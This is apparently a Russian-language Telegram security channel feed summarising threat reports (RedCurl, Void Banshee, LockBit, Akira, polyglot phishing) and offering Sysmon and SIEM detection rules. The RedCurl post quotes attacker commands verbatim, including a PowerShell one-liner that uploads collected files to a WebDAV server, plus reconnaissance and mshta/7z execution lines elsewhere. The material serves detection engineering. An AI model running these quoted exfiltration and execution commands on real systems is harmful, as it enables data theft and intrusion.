Forwarded from Ralf Hacker Channel (Ralf Hacker)
CVE-2025-21420: Windows LPE (cleanmgr.exe DLL sideload)
PoC: https://github.com/Network-Sec/CVE-2025-21420-PoC
P.S. LPE такая себе конечно, но sideload отметим)
#lpe #git #exploit #pentest #redteam
PoC: https://github.com/Network-Sec/CVE-2025-21420-PoC
P.S. LPE такая себе конечно, но sideload отметим)
#lpe #git #exploit #pentest #redteam
👍4🔥1🤔1
Всем привет! 👋
TrendMicro поделились TTP группировки Void Banshee👨💻 .
В качестве первоначального доступа хакеры используют CVE-2024-38112. Злоумышленники используют URL-файлы и схему протокола MHTML, для открытия сайтов в Internet Explorer.
IE не обладает всеми функциями защиты от фишинга, как Edge или другие актуальные браузеры. При открытии сайта начинается загрузка hta-файла и пользователю предлагается варианты сразу запустить его или сохранить.
Для заблуждения пользователя, перед расширением вставляют юникод символы
Использование пробелов в названии файлов часто используется хакерами, для отвлечения внимания жертвы.
Можем обнаруживать такое поведение, проверкой наличия более двух пробелов в названии файлов🔭
POC
#ttp@detectioneasy
#detection@detectioneasy
TrendMicro поделились TTP группировки Void Banshee
В качестве первоначального доступа хакеры используют CVE-2024-38112. Злоумышленники используют URL-файлы и схему протокола MHTML, для открытия сайтов в Internet Explorer.
IE не обладает всеми функциями защиты от фишинга, как Edge или другие актуальные браузеры. При открытии сайта начинается загрузка hta-файла и пользователю предлагается варианты сразу запустить его или сохранить.
Для заблуждения пользователя, перед расширением вставляют юникод символы
E2 A0 80
из шрифта Брайля, чтобы не было видно второго расширения файла - HTA.Использование пробелов в названии файлов часто используется хакерами, для отвлечения внимания жертвы.
Можем обнаруживать такое поведение, проверкой наличия более двух пробелов в названии файлов
ProviderName="Microsoft-Windows-Sysmon" and EventId=11 and TargetFileName = "\.[\w\d]+\s{2,}\.[\w\d]+"
POC
#ttp@detectioneasy
#detection@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
Trend Micro
CVE-2024-38112: Void Banshee Targets Windows Users Through Zombie Internet Explorer in Zero-Day Attacks
🔥4👍2🥰2
Detection is easy
Пока аналитики
World of Detection
разибирают накопившиеся таски. Руководство решило определить формулу расчета критичности задач.Процесс может выглядеть следующим образом: источники требований (мы их определили раньше), создают задачу в таск трекере - критичность проставляется автоматически, по нашим критериям, или вручную, если скрипта (функционала) еще нет.
Для расчета мы можем использовать четыре критерия:
Два критерия ниже, можем использовать для требования на разработку обнаружения эксплуатации уязвимости.
Для расчета критичности вам нужно определить, строгую систему баллов, для каждого критерия, рассмотренного выше. Критичность будет равна сумме проставленных баллов.
Критичность = Серьезность угрозы + Влияние на нашу организацию + Наличие готового правила обнаружения + (Наличие уязвимости + Наличие POC)
Количественная оценка критичности, будет определять ее уровень, например:
1-3 - низкий
4-7 - средний
8-10 - высокий
10+ - критический
#detection@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3🔥3👏3
Forwarded from ДЕВОПСИНА | DevOps | Linux
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3😁3
Всем привет! 👋
Группировка RedCurl сильно преисполнилась в применении multistage при фишинге.
Давайте посмотрим сколько шагов происходит до выполнения последнего этапа:
🔤 Приходит фишинговое письмо с PDF
🔤 Пользователь открывает PDF и кликает на ссылку, которая ведет на загрузку ZIP-архива
🔤 В ZIP-архиве IMG-файл, который монтируется
🔤 В образе диска находится уязвимый
🔤 Обращается на C2 и в ответ получает зашифрованную DLL, которая сохраняется в дирректорию
🔤 Создается задача в планировщике в каталоге
Опытный аналитик обратит внимание на использование
🔤 После выполнения задачи, происходит проверка наличия дебагера, если он есть, то процесс прекращается. На C2 отправляется информация об имени пользователя, имени компьютера, файлах и каталогах с рабочего стола жертвы, и из папок Local, AppData и Program Files.
🔤 Загружается еще один этап и сохраняется в файл с расширением
🔤 Создается
Описал основные шаги из отчета, там происходит еще большое количество этапов шифрования/расшифрования, проверок на песочницу и тп ...
Готовы к такой матрешке?)😔
Идеальное место для обнаружения - это дроп на хост образа диска (img), его монтирование и запуск оттуда исполняемого файла. Если этот этап пропустили, то должны обнаружить создание задачи с аргументами
Если это тоже мимо, то хоть одну команду из🙏
#ttp@detectioneasy
Группировка RedCurl сильно преисполнилась в применении multistage при фишинге.
Давайте посмотрим сколько шагов происходит до выполнения последнего этапа:
ADNotificationManager.exe
, который переименован, как CV Applicant *.scr
. SCR загружает netutils.dll
- EarthKapre loaderC:\Users\User\AppData\Roaming\BrowserOSR\
BrowserOSR
, которая выполняет команду C:\Windows\system32\pcalua.exe -a rundll32 -c shell32.dll,Control_RunDLL C:\Users\User\AppData\Roaming\BrowserOSR\BrowserOSR.dll c7ccd991-41e1-45ab-b0de-b1d229bba429
Опытный аналитик обратит внимание на использование
pcalua.exe -a
- LOLBINS утилита, позволяет создавать новые процессы.tmp
, который выполняется функцией LoadLibraryA
bat-файл
%APPDATA%\Acquisition\JKLYjn2.bat
, который выполняет команды для сбора информации о системе и отправке их на C2net localgroup
net localgroup Administrators
systeminfo
wmic logicaldisk get description,name,Size,FreeSpace
wmic process get Name,Commandline powershell -c "Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct | Out-File -FilePath .\temp7237\<COMPROMISED_COMPUTER_NAME>_AV.txt"
ad.exe -accepteula -snapshot "" temp7237\dmn.dat
powershell -c "gci .*.exe | foreach {if(($.VersionInfo).InternalName -eq '7za'){$syspack = $.Fullname}};$a1='x';$a2='-aoa';$a3='-p'+$env:ppass2;$a4=$env:util;$a5='-o'+$env:tdir;&$syspack $a1 $a2 $a3 $a4 $a5;"
powershell -c "$PSW01 = New-Object -ComObject MSXML2.ServerXMLHTTP;$AFS = New-Object -ComObject ADODB.Stream;$AFS.Open();$AFS.Type = 1;Get-ChildItem .$env:trdir | Where-Object {$.PSIsContainer -eq $false;} | foreach {$AFS.LoadFromFile($.FullName);$AFB = $AFS.Read();$PSW01.Open('PUT', $env:davstr+'/'+$env:davfld+'/'+$_.Name, $False, $env:slog, $env:spass);$PSW01.Send($AFB);};$PSW01.Close;"
Описал основные шаги из отчета, там происходит еще большое количество этапов шифрования/расшифрования, проверок на песочницу и тп ...
Готовы к такой матрешке?)
Идеальное место для обнаружения - это дроп на хост образа диска (img), его монтирование и запуск оттуда исполняемого файла. Если этот этап пропустили, то должны обнаружить создание задачи с аргументами
pcalua.exe -a rundll32
Если это тоже мимо, то хоть одну команду из
bat-файла
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
eSentire
Unraveling the Many Stages and Techniques Used by RedCurl/EarthKapre…
Learn more about how RedCurl/EarthKapre APT performs reconnaissance and espionage and get security recommendations from our Threat Response Unit (TRU) to…
🔥4🍌4👍3
Detection is easy
Идеальное место для обнаружения - это дроп на хост образа диска (img), его монтирование и запуск оттуда исполняемого файла. Если этот этап пропустили, то должны обнаружить создание задачи с аргументами pcalua.exe -a rundll32
Если это тоже мимо, то хоть одну команду из bat-файла🙏
Если это тоже мимо, то хоть одну команду из bat-файла
Давайте сделаем правила для дропа образов диска 🔭
Пример поля
Правило может выглядеть, так:
Второй способ более интересный, мы можем отслеживать события монтирования образов диска в журнале
Пример события:
Пример правила для отслеживания монтирования файлов из директорий пользователя или Temp
Вы собираете и анализируте события из журнала
#detection@detectioneasy
Пример поля
TargetFileName
из Sysmon EventId=11
<Data Name="TargetFilename">C:\Users\qwer\AppData\Local\Temp\5c155200-f11a-49ff-b2c0-7b81180c2322_1.zip.322\1.iso</Data>
Правило может выглядеть, так:
ProviderName="Microsoft-Windows-Sysmon" and EventId=11 and TargetFileName = "(iso|img|vhd.?)$"
Второй способ более интересный, мы можем отслеживать события монтирования образов диска в журнале
Microsoft-Windows-VHDMP
Пример события:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-VHDMP" Guid="{e2816346-87f4-4f85-95c3-0c79409aa89d}" />
<EventID>1</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>1205</Task>
<Opcode>2</Opcode>
<Keywords>0x8000000000000001</Keywords>
<TimeCreated SystemTime="2025-02-21T17:34:19.0116396Z" />
<EventRecordID>199</EventRecordID>
<Correlation />
<Execution ProcessID="4" ThreadID="11804" />
<Channel>Microsoft-Windows-VHDMP-Operational</Channel>
<Computer>QQQ</Computer>
<Security UserID="S-1-5-18" />
</System>
- <EventData>
<Data Name="VhdFileName">C:\Users\qwer\Downloads\1.iso</Data>
<Data Name="VhdDiskNumber">0</Data>
<Data Name="VirtualDisk">0x0</Data>
</EventData>
</Event>
Пример правила для отслеживания монтирования файлов из директорий пользователя или Temp
ProviderName="Microsoft-Windows-VHDMP" and EventId=1 and VhdFileName = "\\users\\|temp\\"
Вы собираете и анализируте события из журнала
Microsoft-Windows-VHDMP
?)#detection@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4🔥4🤔2
У ЛК появился обзор на группировку Angry Likho (Sticky Werewolf), которая пробивает своих жерт RAR-архивом с паролем 😂 )
В архиве, decoy-файл и 2 LNK ⁉️
Далее по цепочке запускается
Похантить?)
🔤 если есть возможность сделайте ретро по входящим письмам, на наличие слова - пароль и его аналогов
#detection@detectioneasy
В архиве, decoy-файл и 2 LNK ⁉️
Далее по цепочке запускается
bat/cmd
, который запускает Autoit - a3x, обнаружение которого мы рассматривали ранее - тутПохантить?)
#detection@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
securelist.ru
Изучаем целевые атаки APT Angry Likho на российские организации
Эксперты «Лаборатории Касперского» анализируют атаки APT-группы Angry Likho, в которых используются обфусцированные AutoIt-скрипты и стилер Lumma для кражи данных.
👍4🔥2🤔2
Всем привет!)
В дополнение к Autoit можем рассмотреть autohotkey (AHK)
AutoHotkey — мощный инструмент для автоматизации задач в Windows, позволяющий создавать скрипты для управления клавиатурой, мышью и приложениями.
Пример использования есть в отчете thedfirreport.com
🔤 Для обнаружения AutoHotkey.exe можем воспользоваться правилом
🔤 поиск в аргументах совпадения с раширением ahk
🔤 создание файлов ahk
#detection@detectioneasy
#ttp@detectioneasy
В дополнение к Autoit можем рассмотреть autohotkey (AHK)
AutoHotkey — мощный инструмент для автоматизации задач в Windows, позволяющий создавать скрипты для управления клавиатурой, мышью и приложениями.
Пример использования есть в отчете thedfirreport.com
ProviderName="Microsoft-Windows-Sysmon" and EventId=1 and (Product="AutoHotkey" or OriginalFileName="AutoHotkey.\w+")
ProviderName="Microsoft-Windows-Sysmon" and EventId=1 and CommandLine="\.ahk($|\s)"
ProviderName="Microsoft-Windows-Sysmon" and EventId=11 and TargetFilename = ".?:\\Users\\.*\.ahk$"
#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
The DFIR Report
Collect, Exfiltrate, Sleep, Repeat
In this intrusion from August 2022, we observed a compromise that was initiated with a Word document containing a malicious VBA macro, which established persistence and communication to a command a…
🔥5👍3🍌2😁1
Вчера вышел отчет от любимых многими thedfirreport - Confluence Exploit Leads to LockBit Ransomware ✌️
Если такая атака и будет, то она должна завершиться🚫 на выполнении команд:
whoami
query user
net user
mshta ...\.hta
curl ...
Это несколько команд, которые выполнялись после пробива сервера с Confluence
Что нас ждет?)
🔤 CVE-2023-22527 на незащищенном сервере Windows Confluence server. На GitHub есть POC
🔤 Хакеры использовали различные инструменты, включая Mimikatz, Metasploit и AnyDesk
🔤 Злоумышленник использовал RDP для горизонтального перемещения
🔤 Данные были эксфильтрованы с помощью Rclone в MEGA.io
🔤 Время до шифрования составило около двух часов. Да-да для любителей метрик есть и такая -
🔤 Для сканирования хостов использовался NetScan
🔤 Для установки рансома использовали PDQ Deploy - легитимный корпоративный инструмент для развёртывания программ и обновлений
🔤 Для получения учетных записей с серера Veeam использовали Powershell скрипт - пример
#ttp@detectioneasy
Если такая атака и будет, то она должна завершиться
whoami
query user
net user
mshta ...\.hta
curl ...
Это несколько команд, которые выполнялись после пробива сервера с Confluence
Что нас ждет?)
Time to Ransom
(TTR)#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
The DFIR Report
Confluence Exploit Leads to LockBit Ransomware
Key Takeaways The intrusion began with the exploitation of CVE-2023-22527 on an exposed Windows Confluence server, ultimately leading to the deployment of LockBit ransomware across the environment.…
🔥6👍3🤔2
Detection is easy
Вчера вышел отчет от любимых многими thedfirreport - Confluence Exploit Leads to LockBit Ransomware ✌️ Если такая атака и будет, то она должна завершиться 🚫 на выполнении команд: whoami query user net user mshta ...\.hta curl ... Это несколько команд, которые…
Хакеры не останавливаются на использовании одних и тех же инструментов, например популярным сканером был
Мы можем бесконечно гоняться за утилитами и основываться на Tools-based detection✋ . Давайте обратимся к пирамиде боли Дэвида Бьянко. Мы нанесем максимальный ущерб атакующим, только научившись обнаруживать их поведение.
В случае со сканером, у нас один процесс создает много соединений:
🔤 на один ip и много портов
🔤 на много ip и много портов
🔤 на много ip и один порт
В идеальной ситуации, у нас будет настроен span/netflow начиная с коммутатора доступа, если бы 😅 В лучшей ситуации span будет с агрегации или ядра, и сетевые сканирования мы сможем обнаружить ids, nta, ndr, но не в широковещательном домене(если без коммутатора доступа) .
В случае с хостом, правило будет зависеть от функционала вашего siem/edr.
Например XP-rules, сетевые соединения с одного хоста на 10 разных:
Мы можем сделать правило от обратного на основе событий с хостов, которые сканят.
🔤 События от 5 разных хостов (нужно не забыть добавиь адресав исключения):
🔤 Много портов на одном хосту. Этим правилом мы можем ничего не увидеть) хочется верить, что вряд ли виндовые хосты будут сканить по всем портам). Подключение на 3 рахных порта
Поверх этих правил можно сделать вложенную корреляцию, чтобы усложнить логику и уменьшить количество фолсов))
#detection@detectioneasy
Advanced Port Scanner
, а в посте выше использовали NetScan
. Ещё есть множество реализаций сканеров, на powershell, wsf etc Мы можем бесконечно гоняться за утилитами и основываться на Tools-based detection
В случае со сканером, у нас один процесс создает много соединений:
В идеальной ситуации, у нас будет настроен span/netflow начиная с коммутатора доступа, если бы 😅 В лучшей ситуации span будет с агрегации или ядра, и сетевые сканирования мы сможем обнаружить ids, nta, ndr, но не в широковещательном домене
В случае с хостом, правило будет зависеть от функционала вашего siem/edr.
Например XP-rules, сетевые соединения с одного хоста на 10 разных:
event NetworkCreate:
key:
object.process.name, event_src.host
filter {
filter::Network_connections_windows
}
rule NetworkScan: NetworkCreate[10] with different(dst.ip)
Мы можем сделать правило от обратного на основе событий с хостов, которые сканят.
event NetworkCreate:
key:
src.ip
filter {
filter::Network_connections_windows
}
rule NetworkScan: NetworkCreate[5] with different(dst.ip)
event NetworkCreate:
key:
src.ip, event_src.host
filter {
filter::Network_connections_windows
}
rule NetworkScan: NetworkCreate[3] with different(dst.port)
Поверх этих правил можно сделать вложенную корреляцию, чтобы усложнить логику и уменьшить количество фолсов))
#detection@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
Picussecurity
What Is Pyramid of Pain?
The Pyramid of Pain is a conceptual framework developed by David Bianco that illustrates the varying levels of difficulty and cost an adversary would encounter to evade detection and continue their attack, in the context of cybersecurity defenses.
👍4🔥3❤2😁1
Detection is easy
Вчера вышел отчет от любимых многими thedfirreport - Confluence Exploit Leads to LockBit Ransomware ✌️ Если такая атака и будет, то она должна завершиться 🚫 на выполнении команд: whoami query user net user mshta ...\.hta curl ... Это несколько команд, которые…
Продожим тему с массовым запуском скриптов или исполняемых файлов. В данном отчете использовался PDQDeploy, но на его месте мог быть планировщик задач, SCCM, KSC, EDR, Gitlab-runner etc
Для обнаружения подозрительных действий агентами централизованного управления, за основу можно взять Sigma-правило, которое обнаруживает запуск дочерних процессов, от агента PDQDeploy.
Для спокойствия нам нужно отслеживать:
🔤 создание новых задач у агентов
🔤 изменение старых задач
🔤 массовый запуск одинаковых скриптов или процессов на разных хостах
#detection@detectioneasy
Для обнаружения подозрительных действий агентами централизованного управления, за основу можно взять Sigma-правило, которое обнаруживает запуск дочерних процессов, от агента PDQDeploy.
Для спокойствия нам нужно отслеживать:
#detection@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
sigma/rules/windows/process_creation/proc_creation_win_pdqdeploy_runner_susp_children.yml at f3de589d08dd0f0b8041a02306f53323b99057aa…
Main Sigma Rule Repository. Contribute to SigmaHQ/sigma development by creating an account on GitHub.
👍5🔥4🤔2🍌1
Всем привет!
PT ESC выпустили отчет о действиях Dark Caracal.
❗️ Обратите внимание на использование контейнера для фишинга - REV-файл
Для обнаружения таких файлов можете использовать правила ниже:
Перед использованием правила ниже, убедитесь, что ваш конфиг Sysmon (если используется) регистрирует события с этим расширением)
#detection@detectioneasy
PT ESC выпустили отчет о действиях Dark Caracal.
❗️ Обратите внимание на использование контейнера для фишинга - REV-файл
Для обнаружения таких файлов можете использовать правила ниже:
ProviderName="Microsoft-Windows-Sysmon" and EventId=1 and CommandLine="\.rev($|\s)
Перед использованием правила ниже, убедитесь, что ваш конфиг Sysmon (если используется) регистрирует события с этим расширением)
ProviderName="Microsoft-Windows-Sysmon" and EventId=11 and TargetFilename = ".?:\\Users\\.*\.rev$"
#detection@detectioneasy
ptsecurity.com
Блог PT ESC Threat Intelligence
В этом блоге вы можете найти информацию об актуальных атаках хакерских группировок по всему миру, разбор их инструментов, информацию об инцидентах, TTP группировок, индикаторы компрометации и названия детектов в наших продуктах
🔥4👍3
Всем привет! 👋
Отличный пример, почему нужно обновлять прошивку и менять стандартные пароли от систем управления серверами (iBMC, Ilo, iDrac etc)
При получении доступа к системе управления сервером, вы увидете экран VNC, скорее всего нужно будет ввести пароль от системы, но может и повезет)
BMC позволяет загрузиться с live-cd, а дальше порядок действий всем знаком:
Для обнаружения таких атак:
🔤 нужно настроить сбор логов с BMC
🔤 настроить правила корреляции (с каких адресов могут авторизовываться), какие учетные записи
🔤 настроить корреляцию для монтирования дисков
🔤 проводить аудит учетных записей и уязвимостей
Еще один пример от Rapid7
#detection@detectioneasy
#ttp@detectioneasy
Отличный пример, почему нужно обновлять прошивку и менять стандартные пароли от систем управления серверами (iBMC, Ilo, iDrac etc)
При получении доступа к системе управления сервером, вы увидете экран VNC, скорее всего нужно будет ввести пароль от системы, но может и повезет)
BMC позволяет загрузиться с live-cd, а дальше порядок действий всем знаком:
создаем локального пользователя, сбрасываем пароль, переименовываем cmd
, дампим креды и т.п (WinPE 😁).
Для обнаружения таких атак:
Еще один пример от Rapid7
#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6🔥3❤2😁1
Слышали ли вы про полиглот?) 😛
Нет, я не про людей которые занют много языков, а про файлы, которые могут интерпретироваться в зависимости от того какой утилитой их открывают)
proofpoint в своем отчете рассказали, как полиглоты применяются при фишинге📩
🔤 пользователю 🤤 приходит письмо со ссылкой, после перехода по которой он обязательно скачает zip-архив и откроет его
🔤 во вложении он увидит 2 полиглота - pdf/hta и pdf/zip в дополнение lnk с двойным расширением, который запустит всю цепочку xls.lnk
🔤 LNK-запускает pdf/hta командой
pdf/hta - pdf в конец которого добавили hta-файл, структура на скриншоте
🔤 hta проверяет наличие одного из архиваторов
🔤 hta добавляет в ключ
🔭 Для обнаружения такого поведения, мы можем отслеживать использование архиваторов с нетипичными для них расширениями файлов, и запуск архиваторов скриптовыми языками
В threat hunting, можем проверить:
🔤 наличие url-файлов в ключах реестра
🔤 наличие exe-файлов в директории
🔤 сделать ретро по запуску архиваторов
Ссылка на семпл
#detection@detectioneasy
#ttp@detectioneasy
Нет, я не про людей которые занют много языков, а про файлы, которые могут интерпретироваться в зависимости от того какой утилитой их открывают)
proofpoint в своем отчете рассказали, как полиглоты применяются при фишинге
Файлы Polyglot - это файлы, которые могут быть интерпретированы как несколько различных форматов, в зависимости от способа их чтения.
"C:\Windows\system32\cmd.exe" /c mshta.exe "%cd%\electronica-2024.pdf" &&' C:\Windows\System32\cmd.exe '
pdf/hta - pdf в конец которого добавили hta-файл, структура на скриншоте
7z, winrar, tar
и распаковывает pdf/zip в директорию с задачами
"C:\Program Files\7-Zip\7z.exe" x "C:\Windows\Tasks\14s.pdf" -o"C:\Windows\Tasks" -y
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
путь к URL-файлу , который запустит exe
из архива для запуска backdoorВ threat hunting, можем проверить:
C:\Windows\Tasks
Ссылка на семпл
#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6🔥4🤔3
Всем привет! 👋
Сегодня пост касается не взлома компаний и организаций, а заражения простых пользователей майнерами и стиллерами🤔
ЛК выпустили ресерч про распространение малвари под видом утилит для обхода блокировок!
⚠️ Стоит обратить внимание на родственников, друзей, может кто-то из братьев или сестер решил посмотреть ютубчик и скачал прогу от более менее известного блогера, а там майнер/стилак 🤮
Что можно делать?)
🔤 напомнить о том, что не нужно скачивать все, что рекламируют)
🔤 проверить наличие директории может быть со схожим именем
🔤 проверить наличие службы с именем
🔤 выполнить полную проверку антивирусом ✌️
🔤 Проверить историю браузера на ресурс
#detection@detectioneasy
Сегодня пост касается не взлома компаний и организаций, а заражения простых пользователей майнерами и стиллерами
ЛК выпустили ресерч про распространение малвари под видом утилит для обхода блокировок!
Что можно делать?)
%LocalAppData%\driverpatch9t1ohxw8\di.exe
DrvSvc
и описанием Launches applications associated with still image acquisition events.
"gitrok[.]com
#detection@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
securelist.ru
SilentCryptoMiner распространяется под видом средства для обхода блокировок
Злоумышленники используют жалобы и угрозу блокировки аккаунта, чтобы заставить YouTube-блогеров под видом средства для обхода блокировок распространять майнер.
👍3🔥2🤔2🥰1
Всем привет! 👋
Настроили мониторинг на веб-камерах, пока вас не пошифровали?🥷
Одна группировка пыталась распространить Akira-ransomware. Они успешно пробились в сеть, закрепились, получили права, которые им позволяют ходить по RDP.
При развертывании Akira на первом Windows-хосте сработал EDR (так бывает)😄
Хакеры не расстроились, просканили сетку, нашли уязвимую видеокамеру. Получили доступ к ее шелу.
С видеокамеры был доступ до серверов, которые нужно шифровать, и как отметили в отчете на ней не было EDR😀
Вооружившись Akira под Linux, через SMB зашифровали, что хотели))
Это нам говорит о чем?)❓
Что можно поставить 100 агентов и написать 5000 правил, но пока не будет базовой сегментации кого-то будут шифровать...
Вот это интересная атака)
#ttp@detectinoeasy
Настроили мониторинг на веб-камерах, пока вас не пошифровали?
Одна группировка пыталась распространить Akira-ransomware. Они успешно пробились в сеть, закрепились, получили права, которые им позволяют ходить по RDP.
При развертывании Akira на первом Windows-хосте сработал EDR (так бывает)
Хакеры не расстроились, просканили сетку, нашли уязвимую видеокамеру. Получили доступ к ее шелу.
С видеокамеры был доступ до серверов, которые нужно шифровать, и как отметили в отчете на ней не было EDR
Вооружившись Akira под Linux, через SMB зашифровали, что хотели))
Это нам говорит о чем?)
Что можно поставить 100 агентов и написать 5000 правил, но пока не будет базовой сегментации кого-то будут шифровать...
Вот это интересная атака)
#ttp@detectinoeasy
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5🔥3🤔3🎉3
Сегодня мы запускаем особый код:
for woman in world:
woman.happiness += 100
woman.love *= infinity
woman.health = max()
Пусть ваш день будет защищен от багов,
А жизнь обновляется, как идеальный код.
Пусть любовь будет, как бесконечный цикл,
А счастье — как успешный деплой!
С праздником, прекрасные дамы!
Ваш код всегда в нашем сердце.
#detection@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5👍3🤔3